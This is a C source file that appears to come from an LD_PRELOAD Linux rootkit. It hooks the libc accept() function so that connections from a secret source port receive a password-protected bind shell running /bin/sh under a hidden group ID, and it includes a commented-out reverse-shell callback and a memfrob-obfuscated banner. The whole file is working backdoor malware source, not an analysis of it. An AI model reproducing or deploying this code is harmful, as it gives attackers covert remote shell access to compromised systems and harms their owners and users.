#include "father.h"

// ascii art
char art[] = {
    0x20, 0x23, 0x23, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0xa,
    0xa,  0xa,  0xa,  0x2,  0xa,  0x3,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0x3,  0xa,  0x3,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0x2,  0xa,  0x2,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x1a, 0xa,  0xa,  0xa,  0xa,  0x17, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x20,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,
    0x17, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x56, 0x56, 0x56,
    0x56, 0x56, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,  0xa,
    0xa,  0xa,  0xa,  0xa,  0xa,  0x20, 0xa,  0xa,  0xa,  0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0xa,  0xa,  0xa,  0x20, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
    0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x20, 0x20, 0x23,
    0x23, 0x6f, 0x44, 0x40, 0x45, 0x53, 0xa,  0x5e, 0x42, 0x4f, 0xa,  0x59,
    0x42, 0x4f, 0x46, 0x46, 0xb,  0x20, 0x20, 0x20,
};

/*
 * accept() hook. If connection comes from our port, use the socket for a bind
 * shell. Alternatively connect back over our hidden port.
 */

int (*o_accept)(int, struct sockaddr *, socklen_t *);
int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen) {

#ifdef DEBUG
  fprintf(stderr, "accept() called!\n");
#endif

  if (!o_accept)
    o_accept = dlsym(RTLD_NEXT, "accept");

  if (getegid() == GID)
    return o_accept(sockfd, addr, addrlen);

  socklen_t mylen;
  struct sockaddr_in mysa;
  struct sockaddr_in *sockaddrptr;
  mylen = sizeof(mysa);

  int check;

  if (addr == NULL) {
    check = o_accept(sockfd, (struct sockaddr *)&mysa, &mylen);
    sockaddrptr = &mysa;
  } else {
    check = o_accept(sockfd, addr, addrlen);
    sockaddrptr = (struct sockaddr_in *)addr;
  }

  if (sockaddrptr && ntohs(sockaddrptr->sin_port) == SOURCEPORT) {
    /*
    // uncomment and comment out the rest to connect via a reverse shell instead
    struct in_addr ip = sockaddrptr->sin_addr;
    char ip_as_str[INET_ADDRSTRLEN];
    inet_ntop(AF_INET, &ip, ip_as_str, INET_ADDRSTRLEN);
    int port = (int)strtol(HIDDENPORT, NULL, 16);
    backconnect(ip_as_str, port);
    */

    pid_t pid;
    if ((pid = fork()) == 0) {
      char pwd[512];
      write(check, "\n\nAUTHENTICATE: ", 16);
      read(check, pwd, 512);

      if (strstr(pwd, SHELL_PASS)) {

        memfrob(art, sizeof(art));

        write(check, "\033[1m", strlen("\033[1m"));
        write(check, art, sizeof(art));
        write(check, "\033[0m", strlen("\033[0m"));

        if (geteuid() == 0)
          setgid(GID);

        dup2(check, 0);
        dup2(check, 1);
        dup2(check, 2);

        execl("/bin/sh", "/bin/sh", (char *)NULL);
      }
    }

    if (pid != 0) {
      errno = ECONNABORTED;
      return -1;
    }
  }

  return check;
}
